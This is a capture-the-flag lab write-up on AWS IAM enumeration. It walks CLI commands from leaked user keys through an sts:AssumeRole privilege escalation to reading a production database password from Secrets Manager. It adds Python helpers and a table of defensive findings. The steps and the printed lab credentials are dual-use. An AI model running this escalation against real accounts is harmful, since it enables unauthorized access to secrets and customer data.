Pwned Labs: Intro to AWS IAM Enumeration
Contents
Enumeration
Initial Access – AWS Credentials
Access key ID: AKIA3SFMDAPOWC2NR5LO
Secret access key: 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
Store these as a named profile (aws configure --profile iam_user) so every command below can select them with --profile.
Verify Access
└──╼ $aws sts get-caller-identity --profile iam_user
{
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/dev01"
}

IAM Policy Enumeration
List Attached Managed Policies
└──╼ $aws iam list-attached-user-policies --user-name dev01 --profile iam_user
{
"AttachedPolicies": [
{
"PolicyName": "AmazonGuardDutyReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
},
{
"PolicyName": "dev01",
"PolicyArn": "arn:aws:iam::794929857501:policy/dev01"
}
]
}
- Attached policies found:
  AmazonGuardDutyReadOnlyAccess (AWS managed policy)
  dev01 (customer managed policy)
List Inline Policies
└──╼ $aws iam list-user-policies --user-name dev01 --profile iam_user
{
"PolicyNames": [
"S3_Access"
]
}
- Inline policy found: S3_Access
View Inline Policy: S3_Access
└──╼ $aws iam get-user-policy --policy-name S3_Access --user-name dev01 --profile iam_user
{
"UserName": "dev01",
"PolicyName": "S3_Access",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::hl-dev-artifacts",
"arn:aws:s3:::hl-dev-artifacts/*"
]
}
]
}
}
- The inline policy lets dev01 list the hl-dev-artifacts bucket (s3:ListBucket on the bucket ARN) and read any object in it (s3:GetObject on the /* ARN).
S3 Bucket Enumeration
└──╼ $aws s3 ls s3://hl-dev-artifacts --profile iam_user
2023-10-01 16:39:53 1235 android-kotlin-extensions-tooling-232.9921.47.pom
2023-10-01 16:39:53 214036 android-project-system-gradle-models-232.9921.47-sources.jar
2023-10-01 16:38:05 32 flag.txt
- The bucket holds a few build artifacts and a flag.txt; download the flag.
Retrieve the Flag
└──╼ $aws s3 cp s3://hl-dev-artifacts/flag.txt . --profile iam_user
download: s3://hl-dev-artifacts/flag.txt to ./flag.txt
└──╼ $cat flag.txt
Redactedc904551935c7514
- Flag: Redacted8545df0c904551935c7514
We’re not done yet: the two managed policies still have to be read, because a policy name says nothing reliable about what it grants.
Get Policy Versions
aws iam get-policy returns only metadata, including DefaultVersionId; the policy document itself comes from get-policy-version with that version id (iam:ListPolicyVersions, also granted here, lists the non-default versions, which are worth reading too).
Custom Managed Policy: dev01
└──╼ $aws iam get-policy --policy-arn arn:aws:iam::794929857501:policy/dev01 --profile iam_user
{
"Policy": {
"PolicyName": "dev01",
"PolicyId": "ANPA3SFMDAPOZWBBGZD4I",
"Arn": "arn:aws:iam::794929857501:policy/dev01",
"Path": "/",
"DefaultVersionId": "v7",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "dev01 policy",
"CreateDate": "2023-10-01T20:29:16+00:00",
"UpdateDate": "2023-10-11T19:59:08+00:00",
"Tags": []
}
}
- Default version: v7
AmazonGuardDutyReadOnlyAccess
└──╼ $aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess --profile iam_user
{
"Policy": {
"PolicyName": "AmazonGuardDutyReadOnlyAccess",
"PolicyId": "ANPAIVMCEDV336RWUSNHG",
"Arn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess",
"Path": "/",
"DefaultVersionId": "v4",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Provides read only access to Amazon GuardDuty resources",
"CreateDate": "2017-11-28T22:29:40+00:00",
"UpdateDate": "2023-11-16T23:07:06+00:00",
"Tags": []
}
}
- Default version: v4
dev01 Managed Policy Permissions
└──╼ $aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/dev01 --version-id v7 --profile iam_user
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"iam:GetRole",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetUserPolicy",
"iam:ListGroupsForUser",
"iam:ListAttachedUserPolicies",
"iam:ListUserPolicies",
"iam:GetUser",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Resource": [
"arn:aws:iam::794929857501:user/dev01",
"arn:aws:iam::794929857501:role/BackendDev",
"arn:aws:iam::794929857501:policy/BackendDevPolicy",
"arn:aws:iam::794929857501:policy/dev01",
"arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
]
}
]
},
"VersionId": "v7",
"IsDefaultVersion": true,
"CreateDate": "2023-10-11T19:59:08+00:00"
}
}
- The policy allows dev01 to read IAM metadata for a fixed set of resources: its own user, the BackendDev role, and the BackendDevPolicy, dev01 and AmazonGuardDutyReadOnlyAccess policies. The BackendDev role and its policy are the obvious next targets. Note that sts:AssumeRole is not in the action list.
└──╼ $aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess --version-id v4 --profile iam_user
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"guardduty:Describe*",
"guardduty:Get*",
"guardduty:List*"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"organizations:ListDelegatedAdministrators",
"organizations:ListAWSServiceAccessForOrganization",
"organizations:DescribeOrganizationalUnit",
"organizations:DescribeAccount",
"organizations:DescribeOrganization",
"organizations:ListAccounts"
],
"Resource": "*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T23:07:06+00:00"
}
}

Enumerating IAM Role: BackendDev
└──╼ $aws iam get-role --role-name BackendDev --profile iam_user
{
"Role": {
"Path": "/",
"RoleName": "BackendDev",
"RoleId": "AROA3SFMDAPO2RZ36QVN6",
"Arn": "arn:aws:iam::794929857501:role/BackendDev",
"CreateDate": "2023-09-29T12:30:29+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::794929857501:user/dev01"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Grant permissions to backend developers",
"MaxSessionDuration": 3600,
"RoleLastUsed": {
"LastUsedDate": "2025-06-22T04:12:49+00:00",
"Region": "us-east-1"
}
}
- The trust policy names dev01 directly as the principal for sts:AssumeRole and has no Condition block (no MFA, source IP or ExternalId requirement). dev01's own policies contain no sts:AssumeRole, and none is needed here: when a same-account trust policy names a user ARN explicitly, the trust policy alone grants the assume (an identity policy is only also required when the principal is the account root). Group policies were not enumerated (iam:ListGroupsForUser is permitted), so the user may hold more than what is shown above. RoleLastUsed shows the role is in active use from us-east-1.
Check BackendDev Policy Permissions
└──╼ $aws iam get-policy --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy --profile iam_user
{
"Policy": {
"PolicyName": "BackendDevPolicy",
"PolicyId": "ANPA3SFMDAPO7OINIQIRR",
"Arn": "arn:aws:iam::794929857501:policy/BackendDevPolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Policy defining permissions for backend developers",
"CreateDate": "2023-09-29T12:44:09+00:00",
"UpdateDate": "2023-09-29T12:44:09+00:00",
"Tags": []
}
}
- Default version: v1
List the BackendDev policy permissions
└──╼ $aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy --version-id v1 --profile iam_user
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"secretsmanager:ListSecrets"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"secretsmanager:GetSecretValue",
"secretsmanager:DescribeSecret"
],
"Resource": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf"
}
]
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-29T12:44:09+00:00"
}
}
- Permissions granted by BackendDevPolicy:
  ec2:DescribeInstances and secretsmanager:ListSecrets on any resource
  secretsmanager:GetSecretValue and secretsmanager:DescribeSecret on a single secret, prod/Customers (ARN suffix -QUhpZf)
- Assuming BackendDev therefore turns read-only IAM and S3 access into read access to a production secret.
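The following is an added example, not code from the lab: the policy documents collected above, transcribed into Python, plus a small offline evaluator that answers the questions the enumeration was really about (what can dev01 do directly, can it assume BackendDev, and what does the role add). The evaluator is deliberately a simplified model of IAM: Allow statements with * and ? wildcards in Action and Resource only, no Deny, Condition, NotAction or resource-based policies, so a True result means "allowed by these documents", not a proof of what AWS would decide. The extra secret ARN in CHECKS is a made-up out-of-scope resource used to show the role's GetSecretValue grant is scoped.

```python
"""Offline evaluation of the IAM policy documents collected in this walkthrough.
Added example; the documents are copied from the CLI output above."""
import re

ACCOUNT = "794929857501"
DEV01_ARN = f"arn:aws:iam::{ACCOUNT}:user/dev01"
ROLE_ARN = f"arn:aws:iam::{ACCOUNT}:role/BackendDev"
SECRET_ARN = f"arn:aws:secretsmanager:us-east-1:{ACCOUNT}:secret:prod/Customers-QUhpZf"

# Identity-based policies attached to dev01: inline S3_Access, customer managed dev01 (v7),
# AWS managed AmazonGuardDutyReadOnlyAccess (v4).
DEV01_POLICIES = [
    {"Statement": [{"Effect": "Allow", "Action": ["s3:ListBucket", "s3:GetObject"],
                    "Resource": ["arn:aws:s3:::hl-dev-artifacts", "arn:aws:s3:::hl-dev-artifacts/*"]}]},
    {"Statement": [{"Effect": "Allow",
                    "Action": ["iam:GetRole", "iam:GetPolicyVersion", "iam:GetPolicy", "iam:ListPolicyVersions",
                               "iam:GetUserPolicy", "iam:ListGroupsForUser", "iam:ListAttachedUserPolicies",
                               "iam:ListUserPolicies", "iam:GetUser", "iam:ListAttachedRolePolicies",
                               "iam:GetRolePolicy"],
                    "Resource": [DEV01_ARN, ROLE_ARN, f"arn:aws:iam::{ACCOUNT}:policy/BackendDevPolicy",
                                 f"arn:aws:iam::{ACCOUNT}:policy/dev01",
                                 "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"]}]},
    {"Statement": [{"Effect": "Allow", "Action": ["guardduty:Describe*", "guardduty:Get*", "guardduty:List*"],
                    "Resource": "*"},
                   {"Effect": "Allow",
                    "Action": ["organizations:ListDelegatedAdministrators",
                               "organizations:ListAWSServiceAccessForOrganization",
                               "organizations:DescribeOrganizationalUnit", "organizations:DescribeAccount",
                               "organizations:DescribeOrganization", "organizations:ListAccounts"],
                    "Resource": "*"}]},
]

# Trust policy of BackendDev and the BackendDevPolicy (v1) attached to the role.
BACKENDDEV_TRUST = {"Statement": [{"Effect": "Allow", "Principal": {"AWS": DEV01_ARN},
                                   "Action": "sts:AssumeRole"}]}
BACKENDDEV_POLICIES = [
    {"Statement": [{"Effect": "Allow", "Action": ["ec2:DescribeInstances", "secretsmanager:ListSecrets"],
                    "Resource": "*"},
                   {"Effect": "Allow", "Action": ["secretsmanager:GetSecretValue", "secretsmanager:DescribeSecret"],
                    "Resource": SECRET_ARN}]},
]


def _as_list(value):
    """IAM accepts a string or a list in Action/Resource/Principal; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _match(pattern, value):
    """IAM wildcard match: * is any run of characters, ? one character; compared case-insensitively."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, value, re.IGNORECASE) is not None


def is_allowed(policies, action, resource):
    """True if any Allow statement in any document covers both the action and the resource."""
    for doc in policies:
        for stmt in doc["Statement"]:
            if stmt.get("Effect") != "Allow":
                continue
            if any(_match(a, action) for a in _as_list(stmt["Action"])) and \
               any(_match(r, resource) for r in _as_list(stmt["Resource"])):
                return True
    return False


def can_assume(trust_doc, principal_arn):
    """True if the role's trust policy names this principal (or *) for sts:AssumeRole."""
    for stmt in trust_doc["Statement"]:
        if stmt.get("Effect") != "Allow":
            continue
        if not any(_match(a, "sts:AssumeRole") for a in _as_list(stmt["Action"])):
            continue
        principal = stmt.get("Principal", {})
        allowed = ["*"] if principal == "*" else _as_list(principal.get("AWS", []))
        if any(p in ("*", principal_arn) for p in allowed):
            return True
    return False


def escalation_gain(user_policies, trust_doc, role_policies, principal_arn, checks):
    """(action, resource) pairs reachable only through the role: granted to the role but not
    directly to the principal. Empty when the trust policy does not admit the principal."""
    if not can_assume(trust_doc, principal_arn):
        return []
    return [(action, resource) for action, resource in checks
            if is_allowed(role_policies, action, resource) and not is_allowed(user_policies, action, resource)]


CHECKS = [
    ("s3:GetObject", "arn:aws:s3:::hl-dev-artifacts/flag.txt"),  # already granted directly
    ("ec2:DescribeInstances", "*"),
    ("secretsmanager:GetSecretValue", SECRET_ARN),
    # constructed out-of-scope secret: not reachable even via the role
    ("secretsmanager:GetSecretValue", f"arn:aws:secretsmanager:us-east-1:{ACCOUNT}:secret:prod/Other-AbCdEf"),
]

if __name__ == "__main__":
    for action, resource in escalation_gain(DEV01_POLICIES, BACKENDDEV_TRUST, BACKENDDEV_POLICIES, DEV01_ARN, CHECKS):
        print(f"via BackendDev only: {action} on {resource}")
```

Run as a script it lists the two permissions that exist only through the role (ec2:DescribeInstances and GetSecretValue on prod/Customers); the flag download is excluded because S3_Access already grants it, and the constructed second secret is excluded because BackendDevPolicy is scoped to one ARN. Against a live account the same questions are answered by the commands above; the point of modelling them is that the escalation path is visible from the policy documents alone, before any AssumeRole call shows up in CloudTrail.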
Privilege Escalation
Assume Role as BackendDev
└──╼ $aws sts assume-role --role-arn arn:aws:iam::794929857501:role/BackendDev --role-session-name BackendDev --profile iam_user
{
"Credentials": {
"AccessKeyId": "ASIA3SFMDAPO3OSDWH7T",
"SecretAccessKey": "i2HLHHfZuWPSp+PeRKy7AJBiDwEIawlaUyYjfUhP",
"SessionToken": "<redacted>",
"Expiration": "2025-06-23T10:34:17+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROA3SFMDAPO2RZ36QVN6:BackendDev",
"Arn": "arn:aws:sts::794929857501:assumed-role/BackendDev/BackendDev"
}
}
Set Credentials:
Add the returned AccessKeyId, SecretAccessKey and SessionToken to ~/.aws/credentials under a new profile (BackendDev) as aws_access_key_id, aws_secret_access_key and aws_session_token. The session token is mandatory for STS credentials; without it every call fails with InvalidClientTokenId. The credentials expire at the Expiration timestamp (one hour by default, matching the role's MaxSessionDuration of 3600), so the profile has to be refreshed by repeating the assume-role call.
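The manual credentials-file edit above, done with a short script. This is an added example rather than part of the write-up: SAMPLE_RESPONSE is a constructed stand-in with the shape of aws sts assume-role output (the real temporary credentials are in the response above), and the credentials-file path is a parameter so the function can be pointed at a scratch file instead of ~/.aws/credentials.

```python
"""Turn an AssumeRole response into a named AWS CLI profile. Added example, not lab code."""
import configparser
import json
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Constructed placeholder response; same keys as the real `aws sts assume-role` output.
SAMPLE_RESPONSE = json.dumps({
    "Credentials": {
        "AccessKeyId": "ASIAEXAMPLEKEY000001",
        "SecretAccessKey": "example-secret-access-key",
        "SessionToken": "example-session-token",
        "Expiration": "2025-06-23T10:34:17+00:00",
    },
    "AssumedRoleUser": {
        "AssumedRoleId": "AROAEXAMPLE:BackendDev",
        "Arn": "arn:aws:sts::794929857501:assumed-role/BackendDev/BackendDev",
    },
})


def write_profile(response_json, profile, path):
    """Add or replace [profile] in an INI-style credentials file; returns the keys written."""
    creds = json.loads(response_json)["Credentials"]
    path = Path(path)
    cfg = configparser.ConfigParser()
    cfg.read(path)  # keeps existing profiles such as iam_user intact
    cfg[profile] = {
        "aws_access_key_id": creds["AccessKeyId"],
        "aws_secret_access_key": creds["SecretAccessKey"],
        # STS credentials are only valid together with the session token;
        # leaving this line out produces InvalidClientTokenId on the first call.
        "aws_session_token": creds["SessionToken"],
    }
    path.parent.mkdir(parents=True, exist_ok=True)
    with open(path, "w") as fh:
        cfg.write(fh)
    os.chmod(path, 0o600)  # the file now holds live credentials
    return dict(cfg[profile])


def read_profile(profile, path):
    """Return the named profile as a dict, or None if it is absent."""
    cfg = configparser.ConfigParser()
    cfg.read(path)
    return dict(cfg[profile]) if cfg.has_section(profile) else None


def seconds_remaining(response_json, now_iso=None):
    """Seconds until the temporary credentials expire (negative once they have).
    now_iso lets the caller pin the clock; default is the current UTC time."""
    exp = datetime.fromisoformat(json.loads(response_json)["Credentials"]["Expiration"])
    now = datetime.fromisoformat(now_iso) if now_iso else datetime.now(timezone.utc)
    return (exp - now).total_seconds()


def demo():
    """Write a pre-existing iam_user profile, add BackendDev beside it, read both back."""
    with tempfile.TemporaryDirectory() as tmp:
        path = Path(tmp) / "credentials"
        cfg = configparser.ConfigParser()
        cfg["iam_user"] = {"aws_access_key_id": "AKIAEXAMPLE", "aws_secret_access_key": "example"}
        with open(path, "w") as fh:
            cfg.write(fh)
        write_profile(SAMPLE_RESPONSE, "BackendDev", path)
        return {"iam_user": read_profile("iam_user", path),
                "BackendDev": read_profile("BackendDev", path)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
    print(f"expires in {seconds_remaining(SAMPLE_RESPONSE):.0f} s")
```

To use it for real, feed the actual assume-role JSON to write_profile with path=Path.home() / ".aws" / "credentials", then confirm the session with aws sts get-caller-identity --profile BackendDev. Setting the three values as AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN environment variables works just as well and leaves nothing on disk once the shell exits.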
Verify Access as Assumed Role
└──╼ $aws sts get-caller-identity --profile iam_user
{
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/dev01"
}
- Run against the iam_user profile this still reports the dev01 user, which only confirms the original keys. To confirm the role session, run the same command with --profile BackendDev; its Arn should be the assumed-role ARN returned by AssumeRole, arn:aws:sts::794929857501:assumed-role/BackendDev/BackendDev, with a UserId of the form AROA...:BackendDev.

Access AWS Secrets Manager
List Secrets
└──╼ $aws secretsmanager list-secrets --profile BackendDev
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf",
"Name": "prod/Customers",
"Description": "Access to the MySQL prod database containing customer data",
"LastChangedDate": "2023-09-29T08:37:58.584000-04:00",
"LastAccessedDate": "2025-06-22T20:00:00-04:00",
"Tags": [],
"SecretVersionsToStages": {
"bf175f57-7e29-4fd1-881f-76e78fdd7320": [
"AWSCURRENT"
]
},
"CreatedDate": "2023-09-29T08:37:58.328000-04:00"
}
]
}
- Secret name: prod/Customers (the ARN carries a random -QUhpZf suffix; --secret-id accepts either the name or the full ARN). The description already says what it protects: the production MySQL database holding customer data.
View the Secret
└──╼ $aws secretsmanager get-secret-value --secret-id prod/Customers --profile BackendDev
{
"ARN": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf",
"Name": "prod/Customers",
"VersionId": "bf175f57-7e29-4fd1-881f-76e78fdd7320",
"SecretString": "{\"username\":\"root\",\"password\":\"$DB$Admin12345\",\"engine\":\"mariadb\",\"host\":\"10.10.14.15\",\"port\":\"3306\",\"dbname\":\"customers\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2023-09-29T08:37:58.579000-04:00"
}
Secret revealed (SecretString decoded):
{
"username": "root",
"password": "$DB$Admin12345",
"engine": "mariadb",
"host": "10.10.14.15",
"port": "3306",
"dbname": "customers"
}

Defending AWS IAM: Findings and Mitigations
| # | Area | Observation | Risk / Impact | Recommendation |
|---|---|---|---|---|
| 1 | IAM user credentials | dev01 is an IAM user with long-lived programmatic access keys (AKIA...); this engagement started from those keys. | Static keys keep working wherever they leak until they are rotated; nothing ties them to a device or session. | Rotate the keys now. Prefer temporary credentials (IAM roles, IAM Identity Center) over access keys for people. |
| 2 | Attached policies | Two managed policies (AmazonGuardDutyReadOnlyAccess, dev01) plus the inline S3_Access policy. | The dev01 policy lets the user read the BackendDev role and its policy, which is exactly what made the escalation path discoverable. | Review each policy document, not just its name. Scope IAM read permissions to what the user's job needs. |
| 3 | Group membership | Not enumerated in this walkthrough (iam:ListGroupsForUser is permitted). | Group policies can add permissions that user-level enumeration misses. | Enumerate groups during review and minimise group permissions. |
| 4 | AssumeRole trust | The BackendDev trust policy names dev01 directly and has no Condition block. | dev01 escalates to the role's permissions with a single sts:AssumeRole call. | Tighten the trust policy and add conditions (aws:MultiFactorAuthPresent for human principals, sts:ExternalId for cross-account use). Keep the role's permissions minimal. |
| 5 | Secrets Manager | BackendDevPolicy grants GetSecretValue on prod/Customers, which holds root credentials for a production MariaDB host. | Anyone holding dev01's keys reaches production database credentials. | Do not give a development role production secrets. Rotate the database password, enable automatic rotation and a customer-managed KMS key, and alert on GetSecretValue in CloudTrail. |
| 6 | S3 access | S3_Access grants s3:ListBucket and s3:GetObject on hl-dev-artifacts. | Build artifacts can be listed and downloaded with leaked keys. | Keep the bucket policy and IAM grants scoped. Use IAM Access Analyzer to review external exposure. |
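Finding 4 in code, as an added example that is not part of the lab: an audit of a role trust policy for the weaknesses in the table (wildcard principal, account-root principal, no MFA or ExternalId condition) and a helper that emits a tightened copy. BACKENDDEV_TRUST is the AssumeRolePolicyDocument from the get-role output above; the hardened document and the condition keys it adds are this example's suggestion, not something the lab contains, and the checks cover only AWS principals, not Service or Federated ones.

```python
"""Audit a role trust policy and produce a tightened version. Added example, not lab code."""
import copy

ACCOUNT = "794929857501"

# AssumeRolePolicyDocument of BackendDev, as returned by `aws iam get-role` above.
BACKENDDEV_TRUST = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow",
                   "Principal": {"AWS": f"arn:aws:iam::{ACCOUNT}:user/dev01"},
                   "Action": "sts:AssumeRole"}],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _assume_statements(doc):
    """Allow statements that grant an sts:AssumeRole* action (or sts:* / *)."""
    for stmt in doc["Statement"]:
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        if stmt.get("Effect") == "Allow" and any(
                a.startswith("sts:assumerole") or a in ("sts:*", "*") for a in actions):
            yield stmt


def audit_trust_policy(doc):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    findings = []
    for stmt in _assume_statements(doc):
        principal = stmt.get("Principal", {})
        aws_principals = ["*"] if principal == "*" else _as_list(principal.get("AWS", []))
        if "*" in aws_principals:
            findings.append("wildcard principal: any AWS account can attempt to assume the role")
        if any(p.endswith(":root") for p in aws_principals):
            findings.append("account-root principal: every identity in that account with "
                            "sts:AssumeRole in an identity policy can assume the role")
        condition_keys = {key.lower()
                          for operator in stmt.get("Condition", {}).values()
                          for key in operator}
        if not condition_keys & {"aws:multifactorauthpresent", "sts:externalid"}:
            findings.append("no MFA or ExternalId condition: possession of the principal's keys is enough")
    return findings


def harden_trust_policy(doc, require_mfa=True, external_id=None):
    """Copy of the trust policy with an MFA requirement (human principals) and, optionally,
    an ExternalId requirement (third-party cross-account principals) on every assume statement.
    The original document is left untouched."""
    hardened = copy.deepcopy(doc)
    for stmt in _assume_statements(hardened):
        condition = stmt.setdefault("Condition", {})
        if require_mfa:
            condition.setdefault("Bool", {})["aws:MultiFactorAuthPresent"] = "true"
        if external_id:
            condition.setdefault("StringEquals", {})["sts:ExternalId"] = external_id
    return hardened


if __name__ == "__main__":
    import json
    for finding in audit_trust_policy(BACKENDDEV_TRUST):
        print("finding:", finding)
    print(json.dumps(harden_trust_policy(BACKENDDEV_TRUST), indent=2))
    print("after hardening:", audit_trust_policy(harden_trust_policy(BACKENDDEV_TRUST)) or "no findings")
```

With the MFA condition in place, dev01 can still assume the role, but only from an MFA-authenticated call (aws sts assume-role ... --serial-number <mfa-device-arn> --token-code <code>), so a leaked access key alone no longer reaches the secret. The ExternalId condition is for the cross-account third-party case and does nothing against a compromised same-account user, which is why the audit accepts either key but the hardening defaults to MFA.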